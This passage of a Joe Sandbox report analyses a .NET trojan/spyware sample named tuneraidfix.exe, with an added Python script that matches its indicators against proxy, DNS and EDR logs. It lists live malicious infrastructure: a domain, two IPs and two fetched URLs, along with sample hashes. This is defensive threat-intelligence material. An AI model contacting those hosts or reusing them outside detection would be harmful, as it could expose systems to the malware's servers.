194.85.248.219 | unknown | Russian Federation | 35478 | DATACENTERRO | false
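The tables above are the indicators a responder would actually pivot on: the contacted domain, the two IPs, the two fetched URLs, and the sample hashes from the report header. The following is an added example (not part of the Joe Sandbox report and not Joe Sandbox code) that loads those indicators and matches them against key=value log lines; the log format and the sample lines are constructed for the example, and the refang step exists so indicators pasted from a defanged ticket still match raw proxy and DNS data.

```python
import re
from urllib.parse import urlsplit

# Network IOCs copied from the report's "Contacted Domains", "Contacted URLs"
# and "Contacted IPs" tables.
IOC_DOMAINS = {"odin.mk-host.com"}
IOC_IPS = {"209.205.200.74", "194.85.248.219"}
IOC_URLS = {
    "http://194.85.248.219/token_ta992i.txt",
    "http://194.85.248.219/publickey.txt",
}
# Hashes of the submitted sample, from the report's "General Information" header.
IOC_SHA256 = {"f135fdb20bb785afb947173d0bbfdfedd1ce5b8c4907f6aa37e9a9a706d8a1db"}
IOC_MD5 = {"01f140fea9669403791fb89c47138d69"}


def refang(value):
    """Undo the usual defanging (hxxp, [.], [:]) so pasted indicators match raw logs."""
    return (value.replace("hxxps://", "https://").replace("hxxp://", "http://")
                 .replace("[.]", ".").replace("[:]", ":"))


def url_hits(url):
    """Return the IOC categories a URL matches, in the order url, domain, ip."""
    url = refang(url.strip())
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    # Canonical form: scheme, host and path only, so query strings, explicit
    # ports and upper-case hosts do not defeat an exact-URL match.
    canon = "{}://{}{}".format(parts.scheme.lower(), host, parts.path or "/")
    hits = []
    if canon in IOC_URLS:
        hits.append("url")
    if host in IOC_DOMAINS:
        hits.append("domain")
    if host in IOC_IPS:
        hits.append("ip")
    return hits


# key=value fields of the constructed log format (an assumption of this example).
KV = re.compile(r"(\w+)=(\S+)")


def scan_line(line):
    """Match one log line (proxy, DNS or EDR file event) against the IOC sets."""
    fields = dict(KV.findall(line))
    hits = []
    if "url" in fields:
        hits.extend(url_hits(fields["url"]))
    if refang(fields.get("query", "")).lower().rstrip(".") in IOC_DOMAINS:
        hits.append("dns-query")
    if fields.get("answer") in IOC_IPS:
        hits.append("dns-answer")
    if fields.get("dst") in IOC_IPS:
        hits.append("dst-ip")
    if fields.get("sha256", "").lower() in IOC_SHA256:
        hits.append("sha256")
    if fields.get("md5", "").lower() in IOC_MD5:
        hits.append("md5")
    return hits


def scan(lines):
    """Return (line, hits) for every line that matched at least one IOC."""
    results = []
    for line in lines:
        hits = scan_line(line)
        if hits:
            results.append((line, hits))
    return results


# Constructed sample log lines (not taken from the report); one benign line included.
SAMPLE_LOG = """\
2021-11-25T15:00:40Z dns client=10.0.0.23 query=odin.mk-host.com. answer=209.205.200.74
2021-11-25T15:00:41Z proxy src=10.0.0.23 method=GET url=hxxp://194[.]85[.]248[.]219/token_ta992i.txt status=200
2021-11-25T15:00:42Z proxy src=10.0.0.23 method=GET url=http://194.85.248.219:80/publickey.txt?x=1 status=200
2021-11-25T15:00:43Z proxy src=10.0.0.24 method=GET url=https://www.bing.com/ status=200
2021-11-25T15:00:12Z edr host=WS-23 sha256=F135FDB20BB785AFB947173D0BBFDFEDD1CE5B8C4907F6AA37E9A9A706D8A1DB path=C:\\Users\\u\\Downloads\\W7UbgU8x18.exe
""".splitlines()

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOG):
        print(", ".join(hits).ljust(22), line)
```

Two caveats from the report itself. Avira URL Cloud rates both contacted URLs "safe" and Virustotal scores them 0%, and the Contacted IPs table marks 194.85.248.219 as not malicious, so reputation feeds alone would not have flagged this traffic; what makes these indicators is that the sample fetched token_ta992i.txt and publickey.txt from that host during analysis. And both ASNs (24SHELLSUS, DATACENTERRO) are hosting networks whose context lists below include other IPs in the same ranges, so match on the FQDN, IP and URL rather than blocking by ASN.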

                                                    General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 528611
Start date: 25.11.2021
Start time: 14:59:18
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 36s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: W7UbgU8x18 (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/7@1/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 0.2% (good quality ratio 0.1%)
• Quality average: 41%
• Quality standard deviation: 41%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 104.208.16.94, 20.54.110.249
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

                                                    Simulations

                                                    Behavior and APIs

Time | Type | Description
15:00:39 | API Interceptor | 726x Sleep call for process: aspnet_regbrowsers.exe modified
15:00:43 | API Interceptor | 1x Sleep call for process: WerFault.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

209.205.200.74 (all associated samples detected as malicious):
• Sales Pro forma invoice_SO0005303101427.docx
• YaMfg60AB4.exe
• EDyyOwFu2Y.rtf
• cwSfuiHmL1.exe
• HqCYq1FI94.rtf
• 2G37r9n60v.exe
• PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docx
• ujbZuYEbJR.exe
• INVOICE - FIRST 2 CONTAINERS 111.xlsx
• ZngI6XZfV9.exe
• 0DjNfigrSU.exe
• CERAMIC VASE%0D%0A (3X40HQ).xlsx
• I7P5KZHgki.exe
• Order Confirmation AB22-00569.xlsx
• PO_SC83994.docx
• veuN0vTYpY.exe
• 6eqc2eIrv4.exe
• JJsI4Pb10I.exe
• PO-367M.xlsx
• 1tDAoT9EWD.exe

194.85.248.219 (associated sample detected as malicious):
• Sales Pro forma invoice_SO0005303101427.docx (context: 194.85.248.219/publickey.txt)

                                                                                            Domains

odin.mk-host.com (all associated samples detected as malicious; each resolved the domain to 209.205.200.74):
• Sales Pro forma invoice_SO0005303101427.docx
• YaMfg60AB4.exe
• EDyyOwFu2Y.rtf
• cwSfuiHmL1.exe
• HqCYq1FI94.rtf
• 2G37r9n60v.exe
• PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docx
• ujbZuYEbJR.exe
• INVOICE - FIRST 2 CONTAINERS 111.xlsx
• ZngI6XZfV9.exe
• 0DjNfigrSU.exe
• CERAMIC VASE%0D%0A (3X40HQ).xlsx
• I7P5KZHgki.exe
• Order Confirmation AB22-00569.xlsx
• PO#SC83994.docx
• PO_SC83994.docx
• veuN0vTYpY.exe
• EB54JNfpvd.rtf
• 6eqc2eIrv4.exe
• JJsI4Pb10I.exe

                                                                                            ASN

24SHELLSUS (all associated samples detected as malicious; contacted IP in parentheses):
• Sales Pro forma invoice_SO0005303101427.docx (209.205.200.74)
• YaMfg60AB4.exe (209.205.200.74)
• EDyyOwFu2Y.rtf (209.205.200.74)
• cwSfuiHmL1.exe (209.205.200.74)
• HqCYq1FI94.rtf (209.205.200.74)
• 2G37r9n60v.exe (209.205.200.74)
• PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docx (209.205.200.74)
• Linux_amd64 (209.205.221.250)
• ujbZuYEbJR.exe (209.205.200.74)
• INVOICE - FIRST 2 CONTAINERS 111.xlsx (209.205.200.74)
• ZngI6XZfV9.exe (209.205.200.74)
• AWB1145235666.PDF.vbs (209.205.207.130)
• 0DjNfigrSU.exe (209.205.200.74)
• CERAMIC VASE%0D%0A (3X40HQ).xlsx (209.205.200.74)
• I7P5KZHgki.exe (209.205.200.74)
• Order Confirmation AB22-00569.xlsx (209.205.200.74)
• RFQ #CNXT-HG20211109.exe (192.119.9.178)
• PO_SC83994.docx (209.205.200.74)
• veuN0vTYpY.exe (209.205.200.74)
• 6eqc2eIrv4.exe (209.205.200.74)

DATACENTERRO (all associated samples detected as malicious; contacted IP in parentheses):
• SK TAX INV.exe (194.85.248.250)
• xA7ry4Ewuk.exe (194.85.248.167)
• Sales Pro forma invoice_SO0005303101427.docx (194.85.248.219)
• Statement from QNB.exe (194.85.248.156)
• CV.exe (194.85.248.250)
• INV.exe (194.85.248.250)
• CV.exe (194.85.248.250)
• TMR590241368.exe (194.85.248.115)
• vIyyHkRXJn (194.85.250.154)
• 267A80yAhp (194.85.250.154)
• QJYxAALd23 (194.85.250.154)
• z4bJfjXDDQ (194.85.250.154)
• XXaLHoecGp (194.85.250.154)
• AGiCic4uDz (194.85.250.154)
• 3B3BMxYG8n (194.85.250.154)
• 6WMo1OYmk3 (194.85.250.154)
• dycuTng5W8 (194.85.250.154)
• xINX4f5M8s (194.85.250.154)
• SSIuSyaBAF (194.85.250.154)
• IMG600094173852.exe
                                                                                            • 194.85.248.115

                                                                                            JA3 Fingerprints

                                                                                            No context

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_W7UbgU8x18.exe_31f1e8177b64c27c98341b539e8a5b3c0473765_6dc08ccc_19fa331d\Report.wer
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):1.096973568105997
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:2lnAlyoZooaHBUZMXSaKsUAe5Z/u7s0S274It9:onAUiolBUZMXSaluZ/u7s0X4It9
                                                                                            MD5:02EF02D2B701A2F22EF28F8A91B293DD
                                                                                            SHA1:0AC42F26155E7234072A6050D6689DF870D4C778
                                                                                            SHA-256:8C11AC9C42AC81E3851DFC5F567C85B713A6BC46755D001BFD43E0B0E127FE4C
                                                                                            SHA-512:BF9A6AF55EA1993BC0809A461447C7270F8D23808CF5E1CFFDC7022ABF0B6C52AD6C4CCC817C9E4BA205800DB123F15A9FFC7B58BCC8793B41DB87DDA77F280A
                                                                                            Malicious:true
                                                                                            Reputation:low
                                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.3.5.4.8.3.1.1.8.9.5.0.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.3.5.4.8.4.2.0.9.5.7.1.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.9.1.e.9.5.3.-.e.7.a.1.-.4.a.7.3.-.9.3.b.b.-.d.3.c.7.6.2.6.6.0.4.8.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.4.a.6.3.9.e.-.3.e.8.3.-.4.4.d.f.-.a.b.8.7.-.a.1.6.2.9.d.1.9.0.c.a.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.7.U.b.g.U.8.x.1.8...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.t.u.n.e.r.a.i.d.f.i.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.0.c.-.0.0.0.1.-.0.0.1.6.-.0.9.c.2.-.6.3.3.6.5.0.e.2.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.5.c.7.b.2.7.4.d.0.f.e.5.3.2.e.f.b.8.e.5.2.c.f.9.5.6.3.4.0.0.b.0.0.0.0.0.0.0.0.!.0.0.0.0.c.4.2.7.8.c.f.2.5.d.a.5.2.a.d.c.0.5.f.4.d.2.1.6.1.a.1.1.c.7.b.9.6.
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B51.tmp.WERInternalMetadata.xml
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):8396
                                                                                            Entropy (8bit):3.696838818148438
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Rrl7r3GLNiGq6E6YIqSUeEQgmfZeVSNCprC89bZesfDmIzm:RrlsNiz6E6YFSUeEQgmfiSeZdfSx
                                                                                            MD5:4CE5FAD37F9ED557C1C5490697F78059
                                                                                            SHA1:0E0871C79981EF7D2487AFA0963C88E9139CB643
                                                                                            SHA-256:3E3AB02E3555C551DD8EE205CF9C3F20D04C2828C78F30C5CC33A74D1A4EE650
                                                                                            SHA-512:5A0C146FE0650ACCAF568A62517F8FA4DA12ABC57C8A88E18CB9FA36BA0E7F10B3279860999972D20A4D0FD3FDA7EE11C83B830789E30F255C892E039728579C
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.4.4.<./.P.i.d.>.......
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F68.tmp.xml
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4740
                                                                                            Entropy (8bit):4.465185228666966
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwSD8zsVJgtWI986WSC8BAo8fm8M4J5Ly2FQ+q8vTLyUm7n1jd:uITfvH7SNMJAKVmz1jd
                                                                                            MD5:453D8F13ADC28961F1969B8D331506E0
                                                                                            SHA1:2A5C9392FE9F6A8AFAFE3F56039526D9C87A6C43
                                                                                            SHA-256:74DE17553E832B589ACE03BEBF313EBB6A10F40DA1BD789F309E6BC2E842D5C6
                                                                                            SHA-512:1C06C173C348A3F2B479D1E33B40546AD3659273DCEF57FC0ACA1F89C92DDBE36A50D2CCF33BEA295218C1F10A0C74E43B500B2423501E1FB06C660BF2FE918E
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1270571" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER343.tmp.dmp
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Nov 25 23:00:36 2021, 0x1205a4 type
                                                                                            Category:dropped
                                                                                            Size (bytes):265465
                                                                                            Entropy (8bit):4.033325209537863
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:cW5Eyjd+pSH0Nm9gIOgF5vUosoYo0WUCgUqOYD:cW5+py089RpD8mYo/Tj
                                                                                            MD5:61DEC122981DCBAF67F08434AC469B4A
                                                                                            SHA1:0A6176FB439D97D67B6BB2FB35E1389297257695
                                                                                            SHA-256:EA7D144F9261ED3EF91EC2C581E1C1DCFF59D4C35A4B72BA162EE0D7F0D749D0
                                                                                            SHA-512:65363992A31A8DCB06C79F5D6AE9D77EC54674BE389A32E901374A7BD485F650AA1586CC52F513EFB51901094523D1C4290428F2D74940751C14569B08415B5C
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: MDMP....... ..........a............D...............X.......<....#.......*...Q..........`.......8...........T............6..............T#..........@%...................................................................U...........B.......%......GenuineIntelW...........T..............a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Windows\appcompat\Programs\Amcache.hve
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):1572864
                                                                                            Entropy (8bit):4.268220487373255
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:nYwMHc2yn+SCXqM+mxefKlphce5T7h0MMOb9PeLcuD7ZowN8EwDo3uu/:YwMHc2yn+SCXqM+BYto/
                                                                                            MD5:B5F6B82A5212B44A94CBE12A338DB812
                                                                                            SHA1:CC1A390F17462BB005F4896918345FB4BC15204B
                                                                                            SHA-256:C8611DE05BEFFE985DEA2AE15A55989FBBD0BA83419F7374DCF107C8AF90C203
                                                                                            SHA-512:17C27C5E40BF78B2CE94433A44730705CA78935F1440AA51E19CDE6473B5B6054F7A7BC3FD4E28328C901A5407BEC4D08637717679BF014BA1A8D9D4B592F032
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...=P..................................................................................................................................................................................................................................................................................................................................................`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):24576
                                                                                            Entropy (8bit):3.807504640723351
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:5UF5TZrdxdXD5FQp8XXQnGOf2o/Pmxwpm5GjZmGmBDTTmb5NGUtYbm:S7Nr1XDQpl1f2o2xwpaWmGmpTmVNGUYb
                                                                                            MD5:7D4E158A3C81C4432E34E07591F31C8E
                                                                                            SHA1:7DFADAD40FC3098F78C9E2730C47F3353C3305F6
                                                                                            SHA-256:45734C12A12E5C99B6CCDE171BF321CECE88FDC91D8815A59E54979093969C18
                                                                                            SHA-512:366F38879BBF7B422E4EAFAA43789864E98B15E5CAA73891E0415FB5C6DFF42ED086C3CC8E81A64A9ACD4AB6C88ED522A689BFA390EAB71BFD7B1F1928F74055
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...=P..................................................................................................................................................................................................................................................................................................................................................`HvLE.^......P..............7..$..9..r.|............................. ..hbin................p.\..,..........nk,.R..=P................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .R..=P....... ...........P............... .......Z.......................Root........lf......Root....nk .R..=P....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
                                                                                            \Device\ConDrv
                                                                                            Process:C:\Users\user\Desktop\W7UbgU8x18.exe
                                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1306
                                                                                            Entropy (8bit):4.990885062259935
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:15wG4C4iWonzpwXWonz6OZkZWGO8sOZcTGpmmwhfoswDEkrl6eR1S1ZRpzZHVwre:sGr4iWozQWozLk8cJE5hfSIz91ZRpse
                                                                                            MD5:7685F6A27382549A35DF3EDA62761724
                                                                                            SHA1:50D09D93E5BD99DDA67FDBC0661AFBABFC2CDA13
                                                                                            SHA-256:02DC0D80E62CBEC6C231EA3AE11D32F585D558978E46D2AB533A53F87D538B7F
                                                                                            SHA-512:F3C44E4BD8123B09BF51A9C2983237F8F1C3D36F1A4CBDD9BC1CF65B0AD8426C778C02DB604D7EB20AA3100A5740C981CDF8D6413DA2B47129EF669F30052581
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: .Unhandled Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.ArgumentException: Process with an Id of 4896 is not running... at System.Diagnostics.Process.GetProcessById(Int32 processId, String machineName).. at System.Diagnostics.Process.GetProcessById(Int32 processId).. at fixedhost.modulation.d1TYC4A1(String path, String cmd, Byte[] data, Boolean d7W15ADW2).. at fixedhost.modulation.cookie(String path, String cmd, Byte[] data).. --- End of inner exception stack trace ---.. at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor).. at System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(Object obj, Object[] parameters, Object[] arguments).. at System.Reflection.RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture).. at System.RuntimeType.InvokeMember(String name, Bind

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):4.673644197618154
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            File name:W7UbgU8x18.exe
                                                                                            File size:24064
                                                                                            MD5:01f140fea9669403791fb89c47138d69
                                                                                            SHA1:c4278cf25da52adc05f4d2161a11c7b96928ccea
                                                                                            SHA256:f135fdb20bb785afb947173d0bbfdfedd1ce5b8c4907f6aa37e9a9a706d8a1db
                                                                                            SHA512:e0b76497aaea31d9915a65eeec2dcdc33ca7ca99377a12b1341a61733869438c02b74e5b09e52b899846e24e675c5eac17c6d940350ac2edf51c53e4a5fab8b9
                                                                                            SSDEEP:384:6ARfkJGzRvrQRkKA4rsf1t2kV5qSaciCjFortND8QobS58/pJbouSbx0Ci3HzKQC:jfkJGzFrQ/Bajf57iBDuf/pJbouSbyCp
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p2............"...0..T..........*r... ........@.. ....................................`................................

                                                                                            File Icon

                                                                                            Icon Hash:00828e8e8686b000

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x40722a
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows cui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                            Time Stamp:0xCB1B3270 [Fri Dec 24 07:40:32 2077 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:v4.0.30319
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
add byte ptr [eax], al
(the same instruction, the decoding of two zero bytes, repeats for the remainder of the entrypoint preview)

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x71d7           0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8000           0x5d8         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xa000           0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x7120           0x38          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
.text   0x2000           0x5230        0x5400    False     0.393322172619   data       4.77599367946    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x8000           0x5d8         0x600     False     0.430989583333   data       4.17289736273    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xa000           0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name         RVA     Size   Type                                                                            Language  Country
RT_VERSION   0x8090  0x348  data
RT_MANIFEST  0x83e8  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2021
Assembly Version  21.13.1.0
InternalName      tuneraidfix.exe
FileVersion       21.13.1.0
CompanyName       MicoTech
LegalTrademarks
Comments
ProductName       tuneraidfix
ProductVersion    21.13.1.0
FileDescription   tuneraidfix
OriginalFilename  tuneraidfix.exe

